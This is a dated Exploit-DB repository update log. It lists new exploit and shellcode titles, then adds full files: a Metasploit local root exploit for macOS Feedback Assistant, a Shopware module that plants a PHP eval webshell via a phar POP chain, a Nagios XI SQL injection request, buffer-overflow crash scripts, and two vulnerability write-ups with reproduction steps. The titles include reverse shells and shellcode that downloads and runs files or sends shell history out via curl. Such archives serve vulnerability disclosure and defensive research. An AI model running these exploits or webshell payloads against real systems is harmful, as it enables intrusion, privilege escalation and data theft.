DB: 2019-05-24

18 changes to exploits/shellcodes

macOS < 10.14.5 / iOS < 12.3 DFG JIT Compiler - 'HasIndexedProperty' Use-After-Free
macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized
macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register
macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl
macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free
Apple macOS < 10.14.5 / iOS < 12.3 DFG JIT Compiler - 'HasIndexedProperty' Use-After-Free
Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized
Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register
Apple macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl
Apple macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free
NetAware 1.20 - 'Add Block' Denial of Service (PoC)
NetAware 1.20 - 'Share Name' Denial of Service (PoC)
Terminal Services Manager 3.2.1 - Denial of Service
Visual Voicemail for iPhone - IMAP NAMESPACE Processing Use-After-Free
Microsoft Windows 10 (17763.379) - Install DLL
Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation
Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation
Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)
Microsoft Windows (x84) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation
Microsoft Internet Explorer 11 - Sandbox Escape
Microsoft Windows - 'Win32k' Local Privilege Escalation

Axis Network Camera - .srv to parhand RCE (Metasploit)
Axis Network Camera - .srv to parhand Remote Code Execution (Metasploit)

HP Intelligent Management - Java Deserialization RCE (Metasploit)
HP Intelligent Management - Java Deserialization Remote Code Execution (Metasploit)

Erlang - Port Mapper Daemon Cookie RCE (Metasploit)
Erlang - Port Mapper Daemon Cookie Remote Code Execution (Metasploit)

CMS Made Simple (CMSMS) Showtime2 - File Upload RCE (Metasploit)
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)
AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)
Pimcore < 5.71 - Unserialize RCE (Metasploit)
AIS logistics ESEL-Server - Unauthenticated SQL Injection Remote Code Execution (Metasploit)
Pimcore < 5.71 - Unserialize Remote Code Execution (Metasploit)

Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)

Nagios XI 5.6.1 - SQL injection

BSD/x86 - setuid(0) + Bind (31337/TCP) Shell Shellcode (94 bytes)
BSD/x86 - setuid(0) + Bind (31337/TCP) Shell (/bin/sh) Shellcode (94 bytes)

Linux/x86 - execve(/sbin/iptables -F) Shellcode (70 bytes)
Linux/x86 - Flush IPTables Rules (execve(/sbin/iptables -F)) Shellcode (70 bytes)

Linux/x86 - /sbin/iptables --flush Shellcode (69 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables --flush) Shellcode (69 bytes)

Linux/x86 - iptables --flush Shellcode (43 bytes)
Linux/x86 - Flush IPTables Rules (iptables --flush) Shellcode (43 bytes)

Linux/x86 - iptables -F Shellcode (43 bytes)
Linux/x86 - Flush IPTables Rules (iptables -F) Shellcode (43 bytes)

Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes)
Linux/x86 - Reverse (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes)

Linux/x86 - Reverse TCP (fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509:1337/TCP) Shell (/bin/sh) + IPv6 Shellcode (Generator) (94 bytes)
Linux/x86 - Reverse (fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509:1337/TCP) Shell (/bin/sh) + IPv6 Shellcode (Generator) (94 bytes)

Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes)
Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP (192.168.2.157/31337) Shellcode (181 bytes)

Linux/x86 - wget chmod execute over execve /bin/sh -c Shellcode (119 bytes)
Linux/x86 - execve(/bin/sh -c) + wget (http://127.0.0.1:8080/evilfile) + chmod 777 + execute Shellcode (119 bytes)
macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes)
macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes)
macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)
macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)
macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)
Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes)
Apple macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes)
Apple macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)
Apple macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)
Apple macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)

Linux/x86 - Polymorphic execve(/bin/sh) Shellcode (63 bytes)
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (63 bytes)

Linux/x86 - Add User (sshd/root) to Passwd File Shellcode (149 bytes)
Linux/x86 - Add User (sshd/root) to /etc/passwd Shellcode (149 bytes)
Linux/x86 - Cat File Encode to base64 and post via curl to Webserver Shellcode (125 bytes)
Linux/ARM - Password-Protected Reverse TCP Shellcode (100 bytes)
Linux/x86 - Rabbit Shellcode Crypter (200 bytes)
Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper
Linux/x86 - Openssl Encrypt Files With aes256cbc Shellcode (185 bytes)
Linux/x86 - cat (.bash_history)+ base64 Encode + curl data (http://localhost:8080) Shellcode (125 bytes)
Linux/ARM - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (S59!) + Null-Free Shellcode (100 bytes)
Linux/x86 - Rabbit Encoder Shellcode  (200 bytes)
Linux/x86 - Reverse (127.0.0.1:8080/TCP) Shell (/bin/sh) + Generator Shellcode (91 Bytes)
Linux/x86 - OpenSSL Encrypt (aes256cbc) Files (test.txt) Shellcode (185 bytes)
Linux/x86 - shred file Shellcode (72 bytes)
Linux/x86 - execve /bin/sh Shellcode (20 bytes)
Linux/x86 - /sbin/iptables -F Shellcode (43 bytes)
Linux x86_64 - Delete File Shellcode (28 bytes)
Linux/x86 - Shred file (test.txt) Shellcode (72 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (20 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (43 bytes)
Linux/x86_64 - Delete File (test.txt) Shellcode (28 bytes)
Linux/x64 - Execve(/bin/sh) Shellcode (23 bytes)

exploits/ios/dos/46913.txt

@@ -0,0 +1,27 @@
+Visual Voicemail (VVM) is a feature of mobile devices that allows voicemail to be read in an email-like format. Carriers set up a Visual Voicemail server that supports IMAP, and the device queries this server for new email. Visual Voicemail is configured over SMS, and carriers inform devices of the location of the IMAP server by sending a specially formatted SMS message containing the URL of the IMAP server.
+
+SMS messages are determined to be VVM-related based on their PID field as well as their contents. Both of these fields can be set by a device sending SMS messages, so any device can send a message that causes Visual Voicemail to query an IMAP server specified in the message. This means that an attacker can force a device to query an IMAP server they control without the user interacting with the device in any way.
+
+There is an object lifetime issue in the iPhone IMAP client that can be accessed in this way. It happens when a NAMESPACE command response contains a namespace that cannot be parsed correctly. It leads to the mailbox separator being freed, but not replaced with a valid object. This leads to a selector being called on an object that is not valid.
+
+To reproduce this issue:
+
+1) Run testcrash.py on a remotely accessible server. To run on port 993, this will need to be on a server that has a domain name, and a certificate that verifies correctly. Replace the "YOUR KEY HERE" fields in testcrash.py with the location of the cert files. On some carriers, it is possible to use port 143 without SSL instead.
+
+2) Send the attached SMS messages to the device, first statepdu.txt and then mboxupdatepdu.txt. Replace the destination number and server location in the messages with the location of your target device and server before sending.
+
+3) The device will connect to the server, and then crash
+
+Note that this attack depends somewhat on the carrier the device is on. I tested this issue on an AT&T SIM. I was not able to reproduce this issue on a T-Mobile SIM, because their network does not allow VVM connections to outside servers. It might be possible to bypass this by hosting the server on a peer device on the network, but I didn't try this. The PID used for VVM SMS messages also varies based on carrier.
+
+I've attached a crash log for this issue. I've also attached decoded.txt, which describes the contents of the SMS pdus, and NAMESPACE.zip, which is a non-minimized PoC that leaders to a wider variety of crashes.
+
+When retrieving a message, the VVM client calls [IMAPAccount _updateSeparatorAndNamespaceWithConnection:] to get the server separator and namespace prefix. This method first retrieves the server separator by calling [MFIMAPConnection separatorChar] which causes the LIST command to be sent to the server, and returns the separator. The method also stores the separator as a member of the connection object, which gives the separator its sole reference. [IMAPAccount _updateSeparatorAndNamespaceWithConnection:]  then calls [MFIMAPConnection serverPathPrefix] to get the prefix,  which in turn calls [MFIMAPConnection _doNamespaceCommand] to perform the NAMESPACE command over the network. If this command fails for any reason (for example, malformed response, LOGOUT command, etc.), it will call [MFIMAPConnection disconnectAndNotifyDelegate:], which removes the separator from the connection object, removing its only reference. The rest of [IMAPAccount _updateSeparatorAndNamespaceWithConnection:]  will then use a separator object that has been freed.
+
+This issue was resolved by adding a lock to [IMAPAccount _updateSeparatorAndNamespaceWithConnection:]  and [MFIMAPConnection disconnectAndNotifyDelegate:] so that they cannot run at the same time for the same connection.
+
+This issue was fixed on Tuesday, May 14
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46913.zip

exploits/macos/local/46914.rb

@@ -0,0 +1,105 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::OSX::Priv
+  include Msf::Post::OSX::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Mac OS X Feedback Assistant Race Condition',
+      'Description'   => %q{
+        This module exploits a race condition vulnerability in Mac's Feedback Assistant.
+        A successful attempt would result in remote code execution under the context of
+        root.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+          'CodeColorist', # Discovery and exploit
+          'timwr',        # Metasploit module
+      ],
+      'References'     => [
+          ['CVE', '2019-8565'],
+          ['URL', 'https://medium.com/0xcc/rootpipe-reborn-part-ii-e5a1ffff6afe'],
+          ['URL', 'https://support.apple.com/en-in/HT209600'],
+          ['URL', 'https://github.com/ChiChou/sploits'],
+      ],
+      'SessionTypes'   => [ 'meterpreter', 'shell' ],
+      'Platform'       => [ 'osx', 'python', 'unix' ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },
+      'Targets'        => [
+          [ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
+          [ 'Python payload',                { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
+          [ 'Command payload',               { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
+      ],
+      'DisclosureDate' => 'Apr 13 2019'))
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def upload_executable_file(filepath, filedata)
+    print_status("Uploading file: '#{filepath}'")
+    write_file(filepath, filedata)
+    chmod(filepath)
+    register_file_for_cleanup(filepath)
+  end
+
+  def check
+    version = Gem::Version.new(get_system_version)
+    if version >= Gem::Version.new('10.14.4')
+      CheckCode::Safe
+    else
+      CheckCode::Appears
+    end
+  end
+
+  def exploit
+    if check != CheckCode::Appears
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    unless writable? datastore['WritableDir']
+      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
+    end
+
+    case target['Arch']
+    when ARCH_X64
+      payload_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"
+      binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
+      upload_executable_file(payload_file, binary_payload)
+      root_cmd = payload_file
+    when ARCH_PYTHON
+      root_cmd = "echo \"#{payload.encoded}\" | python"
+    else
+      root_cmd = payload.encoded
+    end
+    root_cmd = root_cmd + " & \0"
+    if root_cmd.length > 1024
+      fail_with Failure::PayloadFailed, "Payload size (#{root_cmd.length}) exceeds space in payload placeholder"
+    end
+
+    exploit_data = File.binread(File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8565", "exploit" ))
+    placeholder_index = exploit_data.index('ROOT_PAYLOAD_PLACEHOLDER')
+    exploit_data[placeholder_index, root_cmd.length] = root_cmd
+
+    exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"
+    upload_executable_file(exploit_file, exploit_data)
+
+    print_status("Executing exploit '#{exploit_file}'")
+    result = cmd_exec(exploit_file)
+    print_status("Exploit result:\n#{result}")
+  end
+end

exploits/php/remote/46915.rb

@@ -0,0 +1,282 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => "Shopware createInstanceFromNamedArguments PHP Object Instantiation RCE",
+      'Description' => %q(
+        This module exploits a php object instantiation vulnerability that can lead to RCE in
+        Shopware. An authenticated backend user could exploit the vulnerability.
+
+        The vulnerability exists in the createInstanceFromNamedArguments function, where the code
+        insufficiently performs whitelist check which can be bypassed to trigger an object injection.
+
+        An attacker can leverage this to deserialize an arbitrary payload and write a webshell to
+        the target system, resulting in remote code execution.
+
+        Tested on Shopware git branches 5.6, 5.5, 5.4, 5.3.
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'Karim Ouerghemmi',               # original discovery
+          'mr_me <steven@srcincite.io>',    # patch bypass, rce & msf module
+        ],
+      'References' =>
+        [
+          ['CVE', '2017-18357'],                                                                         # not really because we bypassed this patch
+          ['URL', 'https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/']      # initial writeup w/ limited exploitation
+        ],
+      'Platform' => 'php',
+      'Arch' => ARCH_PHP,
+      'Targets' => [['Automatic', {}]],
+      'Privileged' => false,
+      'DisclosureDate' => "May 09 2019",
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "Base Shopware path", '/']),
+        OptString.new('USERNAME', [true, "Backend username to authenticate with", 'demo']),
+        OptString.new('PASSWORD', [false, "Backend password to authenticate with", 'demo'])
+      ]
+    )
+  end
+
+  def do_login
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'Login', 'login'),
+      'vars_post' => {
+        'username' => datastore['username'],
+        'password' => datastore['password'],
+      }
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+    if res.code == 200
+      cookie = res.get_cookies.scan(%r{(SHOPWAREBACKEND=.{26};)}).flatten.first
+      if res.nil?
+        return
+      end
+      return cookie
+    end
+    return
+  end
+
+  def get_webroot(cookie)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'systeminfo', 'info'),
+      'cookie' => cookie
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+    if res.code == 200
+      return res.body.scan(%r{DOCUMENT_ROOT </td><td class="v">(.*) </td></tr>}).flatten.first
+    end
+    return
+  end
+
+  def leak_csrf(cookie)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'CSRFToken', 'generate'),
+      'cookie' => cookie
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+    if res.code == 200
+      if res.headers.include?('X-Csrf-Token')
+        return res.headers['X-Csrf-Token']
+      end
+    end
+    return
+  end
+
+  def generate_phar(webroot)
+    php = Rex::FileUtils.normalize_unix_path("#{webroot}#{target_uri.path}media/#{@shll_bd}.php")
+    register_file_for_cleanup("#{@shll_bd}.php")
+    pop  = "O:31:\"GuzzleHttp\\Cookie\\FileCookieJar\":2:{s:41:\"\x00GuzzleHttp\\Cookie\\FileCookieJar\x00filename\";"
+    pop << "s:#{php.length}:\"#{php}\";"
+    pop << "s:36:\"\x00GuzzleHttp\\Cookie\\CookieJar\x00cookies\";"
+    pop << "a:1:{i:0;O:27:\"GuzzleHttp\\Cookie\\SetCookie\":1:{s:33:\"\x00GuzzleHttp\\Cookie\\SetCookie\x00data\";"
+    pop << "a:3:{s:5:\"Value\";"
+    pop << "s:48:\"<?php eval(base64_decode($_SERVER[HTTP_#{@header}])); ?>\";"
+    pop << "s:7:\"Expires\";"
+    pop << "b:1;"
+    pop << "s:7:\"Discard\";"
+    pop << "b:0;}}}}"
+    file          = Rex::Text.rand_text_alpha_lower(8)
+    stub          = "<?php __HALT_COMPILER(); ?>\r\n"
+    file_contents = Rex::Text.rand_text_alpha_lower(20)
+    file_crc32    = Zlib::crc32(file_contents) & 0xffffffff
+    manifest_len  = 40 + pop.length + file.length
+    phar  = stub
+    phar << [manifest_len].pack('V')              # length of manifest in bytes
+    phar << [0x1].pack('V')                       # number of files in the phar
+    phar << [0x11].pack('v')                      # api version of the phar manifest
+    phar << [0x10000].pack('V')                   # global phar bitmapped flags
+    phar << [0x0].pack('V')                       # length of phar alias
+    phar << [pop.length].pack('V')                # length of phar metadata
+    phar << pop                                   # pop chain
+    phar << [file.length].pack('V')               # length of filename in the archive
+    phar << file                                  # filename
+    phar << [file_contents.length].pack('V')      # length of the uncompressed file contents
+    phar << [0x0].pack('V')                       # unix timestamp of file set to Jan 01 1970.
+    phar << [file_contents.length].pack('V')      # length of the compressed file contents
+    phar << [file_crc32].pack('V')                # crc32 checksum of un-compressed file contents
+    phar << [0x1b6].pack('V')                     # bit-mapped file-specific flags
+    phar << [0x0].pack('V')                       # serialized File Meta-data length
+    phar << file_contents                         # serialized File Meta-data
+    phar << [Rex::Text.sha1(phar)].pack('H*')     # signature
+    phar << [0x2].pack('V')                       # signiture type
+    phar << "GBMB"                                # signature presence
+    return phar
+  end
+
+  def upload(cookie, csrf_token, phar)
+    data = Rex::MIME::Message.new
+    data.add_part(phar, Rex::Text.rand_text_alpha_lower(8), nil, "name=\"fileId\"; filename=\"#{@phar_bd}.jpg\"")
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'backend', 'mediaManager', 'upload'),
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'data' => data.to_s,
+      'cookie' => cookie,
+      'headers' => {
+        'X-CSRF-Token' => csrf_token
+      }
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+    if res.code == 200 && res.body =~ /Image is not in a recognized format/i
+      return true
+    end
+    return
+  end
+
+  def leak_upload(cookie, csrf_token)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'MediaManager', 'getAlbumMedia'),
+      'cookie' => cookie,
+      'headers' => {
+        'X-CSRF-Token' => csrf_token
+      }
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+    if res.code == 200 && res.body =~ /#{@phar_bd}.jpg/i
+      bd_path = $1 if res.body =~ /media\\\/image\\\/(.{10})\\\/#{@phar_bd}/
+      register_file_for_cleanup("image/#{bd_path.gsub("\\", "")}/#{@phar_bd}.jpg")
+      return "media/image/#{bd_path.gsub("\\", "")}/#{@phar_bd}.jpg"
+    end
+    return
+  end
+
+  def trigger_bug(cookie, csrf_token, upload_path)
+    sort = {
+      "Shopware_Components_CsvIterator" => {
+        "filename" => "phar://#{upload_path}",
+        "delimiter" => "",
+        "header" => ""
+      }
+    }
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'ProductStream', 'loadPreview'),
+      'cookie' => cookie,
+      'headers' => {
+        'X-CSRF-Token' => csrf_token
+      },
+      'vars_get' => { 'sort' => sort.to_json }
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+    return
+  end
+
+  def exec_code
+    send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "media", "#{@shll_bd}.php"),
+      'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
+    }, 1)
+  end
+
+  def check
+    cookie = do_login
+    if cookie.nil?
+      vprint_error "Authentication was unsuccessful"
+      return Exploit::CheckCode::Safe
+    end
+    csrf_token = leak_csrf(cookie)
+    if csrf_token.nil?
+      vprint_error "Unable to leak the CSRF token"
+      return Exploit::CheckCode::Safe
+    end
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'ProductStream', 'loadPreview'),
+      'cookie' => cookie,
+      'headers' => { 'X-CSRF-Token' => csrf_token }
+    )
+    if res.code == 200 && res.body =~ /Shop not found/i
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    unless Exploit::CheckCode::Vulnerable == check
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+    @phar_bd  = Rex::Text.rand_text_alpha_lower(8)
+    @shll_bd  = Rex::Text.rand_text_alpha_lower(8)
+    @header   = Rex::Text.rand_text_alpha_upper(2)
+    cookie = do_login
+    if cookie.nil?
+      fail_with(Failure::NoAccess, "Authentication was unsuccessful")
+    end
+    print_good("Stage 1 - logged in with #{datastore['username']}: #{cookie}")
+    web_root = get_webroot(cookie)
+    if web_root.nil?
+      fail_with(Failure::Unknown, "Unable to leak the webroot")
+    end
+    print_good("Stage 2 - leaked the web root: #{web_root}")
+    csrf_token = leak_csrf(cookie)
+    if csrf_token.nil?
+      fail_with(Failure::Unknown, "Unable to leak the CSRF token")
+    end
+    print_good("Stage 3 - leaked the CSRF token: #{csrf_token}")
+    phar = generate_phar(web_root)
+    print_good("Stage 4 - generated our phar")
+    if !upload(cookie, csrf_token, phar)
+      fail_with(Failure::Unknown, "Unable to upload phar archive")
+    end
+    print_good("Stage 5 - uploaded phar")
+    upload_path = leak_upload(cookie, csrf_token)
+    if upload_path.nil?
+      fail_with(Failure::Unknown, "Cannot find phar archive")
+    end
+    print_good("Stage 6 - leaked phar location: #{upload_path}")
+    trigger_bug(cookie, csrf_token, upload_path)
+    print_good("Stage 7 - triggered object instantiation!")
+    exec_code
+  end
+end

exploits/php/webapps/46910.txt

@@ -0,0 +1,26 @@
+# Exploit Title: Nagiosxi username sql injection
+# Date: 22/05/2019
+# Exploit Author: JameelNabbo
+# Website: jameelnabbo.com
+# Vendor Homepage: https://www.nagios.com
+# Software Link: https://www.nagios.com/products/nagios-xi/
+# Version: xi-5.6.1
+# Tested on: MacOSX
+#CVE: CVE-2019-12279
+
+POC:
+
+POST /nagiosxi/login.php?forgotpass HTTP/1.1
+Host: example.com
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://example.com/nagiosxi/login.php?forgotpass
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 129
+Connection: close
+Cookie: nagiosxi=iu78vcultg46f35fq7lfbv8tc6
+Upgrade-Insecure-Requests: 1
+
+page=%2Fnagiosxi%2Flogin.php&pageopt=resetpass&nsp=cb6ad70efd0cc0b36ff4fc1d67cd70fb96a7e06622d281acb8810aa65485b03b&username={SQL INJECTION}

exploits/windows/dos/46908.py

@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: NetAware 1.20 - 'Add Block' Denial of Service (PoC)
+# Date: 22/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://www.infiltration-systems.com
+# Software: http://www.infiltration-systems.com/Files/netaware.zip
+# Version: 1.20
+# Tested on: Windows 7
+
+# Proof of Concept:
+# 1.- Run the python script 'NetAware.py', it will create a new file 'NetAware.txt'
+# 2.- Copy the text from the generated NetAware.txt file to clipboard
+# 3.- Open NetAware 
+# 4.- Go to 'Settings' > 'User Blocking'
+# 5.- Click 'Add Block', paste clipboard in the field 'Add a website or keyword to be filtered...' and click 'OK'
+# 6.- Select the block created and click 'Remove', you will see a crash
+
+buffer = "\x41" * 512
+
+f = open ("NetAware.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows/dos/46909.py

@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: NetAware 1.20 - 'Share Name' Denial of Service (PoC)
+# Date: 22/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://www.infiltration-systems.com
+# Software: http://www.infiltration-systems.com/Files/netaware.zip
+# Version: 1.20
+# Tested on: Windows 7
+
+# Proof of Concept:
+# 1.- Run the python script 'NetAware_share.py', it will create a new file 'NetAware.txt'
+# 2.- Copy the text from the generated NetAware.txt file to clipboard
+# 3.- Open NetAware 
+# 4.- Click 'Manage Shares' > 'Add a New Share...'
+# 5.- Paste clipboard in the field 'Share Name', in the field 'Share Path' write anything, e.g. test and the field 'User Limit' select Maximum allowed
+# 6.- Click 'Ok', you will see a crash
+
+buffer = "\x41" * 1000
+
+f = open ("NetAware.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows/dos/46911.py

@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Terminal Services Manager 3.2.1 - Local Buffer Overflow Denial of Service
+# Date: 22/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://lizardsystems.com
+# Software: https://lizardsystems.com/files/releases/terminal-services-manager/tsmanager_setup_3.2.1.247.exe
+# Version: 3.2.1 (Build 247)
+# Tested on: Windows 10
+
+# Steps to produce the crash:
+# 1.- Run the python script 'tsmanager.py', it will create a new file 'evil.txt'
+# 2.- Open Terminal Services Manager
+# 3.- Click 'Add computer'
+# 4.- Now paste the content of evil.txt into the field: 'Computer name or IP address' and click 'OK'
+# 5.- In the 'List' tab select the computer created.
+# 6.- Now in the 'Servers' tab double click on the created computer, wait and you will see a crash! 
+
+buffer = "\x41" * 5000
+
+f = open ("evil.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows/local/46912.txt

@@ -0,0 +1,58 @@
+Windows: CmKeyBodyRemapToVirtualForEnum Arbitrary Key Enumeration EoP
+Platform: Windows 10 1809 (not tested earlier)
+Class: Elevation of Privilege
+Security Boundary (per Windows Security Service Criteria): User boundary
+
+Summary: 
+
+The kernel’s Registry Virtualization doesn’t safely open the real key for a virtualization location leading to enumerating arbitrary keys resulting in EoP.
+
+Description:
+
+When the virtualization flag is set on the primary token certain parts of the HKLM\Software hive are virtualized to a per-user location under Software\Classes. If the key exists in HKLM (and can be virtualized) then a handle to the HKLM key is opened read-only and the virtualized key is only created if any modification is made to the key, such as writing a value.
+
+However, if a virtualized key already exists then that key is opened and the real key is only opened on demand. One reason to open the backing key is if the virtual key is enumerated, to provide compatibility the kernel will merge the key/value information from the real key into the virtual key. The real key is opened every time a call is made to NtEnumerateKey, NtQueryValue etc.
+
+The open of the real key is performed in CmKeyBodyRemapToVirtualForEnum. It first constructs the real path to the key using CmpReparseToVirtualPath then opens the key object using ObReferenceObjectByName. The problem here is two fold:
+1) The access mode passed to ObReferenceObjectByName is KernelMode which means security checking is disabled.
+2) The open operation will follow symbolic links in the registry.
+
+When combined together these two issues allow a normal user to redirect a real key to an arbitrary registry location, as security checking is disabled then it will open any key including the SAM or BCD hives. The only requirement is finding a virtualizable key inside HKLM which is writable by the normal user. There’s a number of examples of this, but the easiest and ironic one to exploit is the HKLM\SOFTWARE\Microsoft\DRM key. In order to get the virtualization to work you do need to create a new subkey, without any virtualization flags (the DRM key can be virtualized anyway) with a security descriptor which limits the user to read-only but grants the administrator group full access. This will meet the virtualization criteria, and as the key is in HKLM which is a trusted hive then any symbolic link can reparse to any other hive. This can be exploited as follows:
+
+1) Create a new subkey of DRM which can only be written to by an administrator (just pass an appropriate security descriptor). This should be done with virtualization disabled.
+2) Open the new subkey requesting read and write access with virtualization enabled. Write a value to the key to cause it to be virtualized then close it.
+3) Reopen the subkey requesting read and write access with virtualization enabled.
+4) Replace the new subkey in DRM with a symlink to \Registry\Machine\SAM\SAM. 
+5) Enumerate keys or values of the virtual key, it should result in the SAM hive being opened and enumerated. Repeat the process to dump all data from the hive as needed.
+
+Fixing wise, I’m not really sure why the real key is opened without any access checking as the code should have already checked that the user could open the real key for read-only in order to create the virtual key and if the call fails it doesn’t seem to impact the enumeration process, just it doesn’t return the data. You might try and block symbolic link reparsing, but passing OBJ_OPEN_LINK isn’t sufficient as you could replace a key higher up the key path which is the actual symbolic link.
+
